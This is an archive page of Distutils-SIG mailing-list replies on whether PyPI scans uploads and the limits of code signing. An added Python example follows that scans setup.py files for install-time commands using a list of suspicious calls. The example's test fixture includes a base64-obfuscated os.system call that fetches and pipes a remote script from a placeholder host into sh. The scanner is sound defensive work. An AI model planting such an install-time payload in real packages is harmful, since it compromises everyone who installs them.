[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Petr Viktorin
On 2/8/19 3:09 PM, Wayne Werner wrote:
> On Fri, Feb 8, 2019, 6:18 AM Thomas Kluyver wrote:
>> I forgot to mention that there is work/discussion about supporting code signing, in PEPs 458 and 480. But it's a complicated topic, and code signing is

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Wayne Werner
On Fri, Feb 8, 2019, 6:18 AM Thomas Kluyver wrote:
> I forgot to mention that there is work/discussion about supporting code signing, in PEPs 458 and 480. But it's a complicated topic, and code signing is not the silver bullet that some commentators seem to think it is.

Yeah, I can sign malicious

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Thomas Kluyver
I forgot to mention that there is work/discussion about supporting code signing, in PEPs 458 and 480. But it's a complicated topic, and code signing is not the silver bullet that some commentators seem to think it is.

On Fri, Feb 8, 2019, at 12:10 PM, Thomas Kluyver wrote:
> On Thu, Feb 7, 2019,

[Distutils] Re: Question on Python Package scanning

2019-02-08 Thread Thomas Kluyver
On Thu, Feb 7, 2019, at 11:55 PM, Prateek Mohta wrote:
> I wanted to check if the packages available on Pypi.org are scanned for any security vulnerabilities or not, can you please confirm.

As far as I know, they are not.

> My concern is how do you control if someone uploads malicious code
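Since the thread says PyPI does not scan uploads, and Wayne's reply notes that malicious code can be signed just as easily as benign code, a consumer who wants a check has to run one locally. The following is an added example, not code from this thread, from PyPI or from the PEP 458/480 work: it builds a minimal sdist in memory (constructed sample input), pulls out setup.py and walks its AST for calls that execute commands or decode obfuscated payloads at install time. The list of suspicious calls is an assumption for illustration, not a complete rule set. A signature or hash pin on the same tarball would not change the verdict, because both attest to who published the bytes, not to what the bytes do.

```python
"""Rudimentary install-time-behaviour scan of a Python sdist (added example)."""
import ast
import io
import tarfile

# Calls with no business in a setup.py. Assumed list for illustration only;
# a real scanner would need far more than this.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
    "compile", "urllib.request.urlopen", "base64.b64decode",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source):
    """Return sorted (lineno, dotted_call) pairs for suspicious calls in setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


def scan_sdist(tar_bytes):
    """Scan every setup.py in an sdist (.tar.gz bytes); returns {member: findings}."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                source = tar.extractfile(member).read().decode("utf-8")
                report[member.name] = scan_setup_py(source)
    return report


def build_sdist(dirname, setup_py):
    """Build a minimal in-memory sdist tarball (constructed sample input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode("utf-8")
        info = tarfile.TarInfo(name=f"{dirname}/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed samples: a benign release and a follow-up release that runs a
# base64-obfuscated shell command at install time (the host is example.invalid
# and nothing here is ever executed; the scanner only parses the source).
BENIGN_SETUP = """
from setuptools import setup
setup(name="benignpkg", version="1.0")
"""

MALICIOUS_SETUP = """
import base64, os
from setuptools import setup
os.system(base64.b64decode(b"Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA==").decode())
setup(name="benignpkg", version="1.0.1")
"""


def demo():
    """Scan both constructed sdists; returns (benign_report, malicious_report)."""
    benign = scan_sdist(build_sdist("benignpkg-1.0", BENIGN_SETUP))
    malicious = scan_sdist(build_sdist("benignpkg-1.0.1", MALICIOUS_SETUP))
    return benign, malicious


if __name__ == "__main__":
    for label, report in zip(("benign", "malicious"), demo()):
        for member, findings in report.items():
            print(label, member, findings or "clean")
```

The scan is deliberately shallow: it only sees direct calls by dotted name, so `getattr(os, "system")` or code hidden in a custom build command would slip past it. The point is where the check runs, not how clever it is: a consumer can parse the artifact they are about to install, whereas a signature on that artifact only tells them who uploaded it.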